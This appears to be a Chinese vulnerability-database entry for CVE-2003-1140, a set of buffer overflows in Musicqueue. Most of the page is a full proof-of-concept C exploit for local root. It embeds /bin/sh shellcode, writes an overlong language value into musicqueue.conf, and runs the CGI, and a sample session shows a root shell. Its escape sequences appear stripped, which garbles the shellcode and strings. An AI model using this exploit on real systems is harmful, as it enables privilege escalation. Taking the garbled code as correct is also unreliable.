Musicqueue 多个缓冲区溢出漏洞

Musicqueue 多个缓冲区溢出漏洞

漏洞ID 1107541 漏洞类型 缓冲区溢出
发布时间 2003-10-27 更新时间 2005-10-20
图片[1]-Musicqueue 多个缓冲区溢出漏洞-安全小百科CVE编号 CVE-2003-1140
图片[2]-Musicqueue 多个缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200310-082
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/23303
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200310-082
|漏洞详情
Musicqueue1.2.0版本存在缓冲区溢出漏洞。本地用户可以通过配置文件中的语言变量执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/8903/info

Multiple buffer overrun vulnerabilities have been discovered in Musicqueue. Both issues stem from the lack of bounds checking when passing user-supplied input to the sprintf() libc function. As a result, it may be possible for an attacker to exploit arbitrary code with the privileges the affected application, possibly installed suid or sgid.

/*
**
** 0x82-musicqueue_over - musicqueue.cgi local root `Proof of Concept' exploit
**
** This is general overflow exploit.
**
** --
** bash-2.04$ ./0x82-musicqueue_over /tmp/musicqueue-1.1.1/musicqueue.cgi
**
** 0x82-musicqueue_over - musicqueue.cgi v-0.9~1.1.1 `Proof of Concept'
**
** sh-2.04# id
** uid=0(root) gid=0(root) groups=500(x82)
** sh-2.04# 
** --
** exploit by "you dong-hun"(Xpl017Elz), <[email protected]>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/

#include <stdio.h>

int main(int argc,char *argv[])
{
	FILE *fp;
	int r_rn=0;
	char *ent_r[3],atck_d[0x82];
	char shellcode[]=
		"220@220@220@220@220@220@220@220@220@"
		"220@220@220@220@220@220@220@220@220@"
		"1300260F133313113152001300260G13331"
		"31131520035337^211vb1300210F07"
		"211Ff26013211363215Nb215Vf3152001"
		"333211330@315200350334377377377"
		"/bin/sh";

	unsigned long sh_addr=(0xbfffffff-(strlen(shellcode)));
	memset((char *)atck_d,0,sizeof(atck_d));

	fprintf(stdout,"n 0x82-musicqueue_over - musicqueue.cgi v-0.9~1.1.1 POC exploit.nn");

	if(argc<2)
	{
		fprintf(stdout," Usage: %s [musicqueue.cgi path]nn",argv[0]);
		exit(-1);
	}
	else sh_addr-=(strlen(argv[1]));

	atck_d[r_rn++]=0x82;
	for(;r_rn<44;r_rn+=4)
	{
		*(long *)&atck_d[r_rn]=sh_addr;
	}

	if((fp=fopen("musicqueue.conf","w"))==NULL)
	{
	fprintf(stderr," [-] musicqueue.conf fopen() error.nn");
	return(-1);
	}
	fprintf(fp,"language = %sn",atck_d);
	fclose(fp);

	ent_r[0]="REQUEST_METHOD=GET";
	ent_r[1]=(shellcode);
	ent_r[2]=(NULL);
	execle(argv[1],"musicqueue.cgi",NULL,ent_r);
}
|参考资料

来源:XF
名称:musicqueue-getconf-bo(13521)
链接:http://xforce.iss.net/xforce/xfdb/13521
来源:BID
名称:8903
链接:http://www.securityfocus.com/bid/8903
来源:BUGTRAQ
名称:20031027Musicqueuemultiplelocalvulnerabilities
链接:http://www.securityfocus.com/archive/1/342476
来源:SECTRACK
名称:1008014
链接:http://securitytracker.com/id?1008014
来源:SECUNIA
名称:10104
链接:http://secunia.com/advisories/10104
来源:VULNWATCH
名称:20031027Musicqueuemultiplelocalvulnerabilities
链接:http://archives.neohapsis.com/archives/vulnwatch/2003-q4/0021.html

相关推荐: WebzEdit done.jsp跨站脚本攻击(XSS)漏洞

WebzEdit done.jsp跨站脚本攻击(XSS)漏洞 漏洞ID 1201055 漏洞类型 跨站脚本 发布时间 2004-11-23 更新时间 2004-11-23 CVE编号 CVE-2004-0314 CNNVD-ID CNNVD-200411-09…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享